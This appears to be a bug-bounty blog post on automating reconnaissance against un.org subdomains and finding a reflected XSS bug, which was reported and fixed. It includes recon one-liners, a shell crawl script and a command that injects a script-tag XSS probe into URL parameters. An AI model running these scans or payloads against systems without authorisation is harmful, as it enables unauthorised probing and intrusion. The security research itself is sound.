This article is about how I got my name into the United Nations hall of fame by finding a reflected XSS bug while I slept.
If you are a beginner in bug hunting, you have probably read a ton of articles on understanding and finding XSS bugs. Me too!
The classic methodology to find them is…
- collect all the archived URLs with ‘waybackurls’ or ‘gau’
- select all the links that take parameters (have ‘=’ in them)
- pipe all those links to ‘kxss’ and look for the ones that don't filter characters like <, >, ", '
- target those links and try to inject code into those parameters (for the basic methodology of finding XSS, read https://vikaran101.medium.com/reflected-xss-on-byjus-my-first-bug-a5bbab098748)
Using all these points to form a one-liner (‘qsreplace’ here helps by deduplicating the links piped to ‘kxss’, saving time)…
waybackurls un.org | grep = | qsreplace test | kxss
But the full methodology is a little longer (collecting all alive subdomains, taking screenshots, etc.).
Recon tasks like this are long and boring, and I always spent the first half-hour of hunting, when my concentration is at its peak, running such repetitive tasks. On top of that, long scans would often be interrupted by network or battery problems.
Setting up a Virtual Private Server
The solutions to these problems were quite easy. To solve the second problem, I set up a Linux VPS on DigitalOcean and installed the necessary tools. I ran the commands inside a ‘tmux’ pane so that my sessions would survive even if I logged out.
As I ran waybackurls on the target, I noticed something very weird about the tool.
Case 1: If I run waybackurls on un.org, I get web archive links for that domain from all of its subdomains.
>> waybackurls un.org
In the example above I get only 2 results from ‘x.un.org’, but in case 2…
Case 2: Running ‘waybackurls’ only on ‘x.un.org’
>> waybackurls x.un.org
I realised that I get more results for a given subdomain if I pass it to the tool separately. This meant that to maximise my attack surface, I had to run waybackurls on every subdomain. I don't have the patience to do that by hand, so I decided to write a script for it.
I added this code alongside code that collects subdomains from tools like ‘subfinder’, ‘amass’ and ‘findomain’, extracts all the alive hosts with ‘httpx’, and feeds that list to ‘recursive_wayback()’. Once the URL list was built, I piped it to ‘kxss’. With the list of URLs and their unfiltered characters in hand, I was free to look for points vulnerable to reflected XSS.
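The script itself isn't shown above, so here is a minimal sketch of what ‘recursive_wayback()’ could look like; the function name comes from the article, but the body is my assumption:

```shell
#!/usr/bin/env bash
# Sketch of recursive_wayback(): instead of one waybackurls run on the
# apex domain, query the archive for each subdomain individually.
# $1 is assumed to be a file with one subdomain per line.
recursive_wayback() {
    while read -r sub; do
        waybackurls "$sub"       # archived URLs for this subdomain alone
    done < "$1" | sort -u        # deduplicate across subdomains
}
```

Feeding it the combined subfinder/amass/findomain output then yields one deduplicated URL list ready to pipe into ‘kxss’.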
I started the scan before I went to sleep. When I woke up after ̶8̶ 6 hours, the report was ready.
Once I found that the ‘redirectTo’ parameter doesn't filter <, >, ", ', I knew I could trigger an XSS vulnerability.
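To illustrate that last step: once kxss flags a parameter, you swap its value for a probe payload. ‘qsreplace’ does this across a whole URL list; a rough plain-shell stand-in (the URL and payload here are illustrative, not the actual report) looks like:

```shell
# Illustrative only: substitute every query-string value with an XSS
# probe, roughly what `qsreplace '<payload>'` does for a list of URLs.
payload='"><script>alert(1)</script>'
echo 'https://x.un.org/page?redirectTo=test' | sed "s|=[^&]*|=$payload|g"
# If the response echoes this back without encoding < > " ', the
# parameter is exploitable for reflected XSS.
```

The `|` delimiter in sed avoids clashing with the `/` characters inside the payload.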
Reported: 16th April 2022
Fixed: 21st April 2022
Acknowledged: 25th April 2022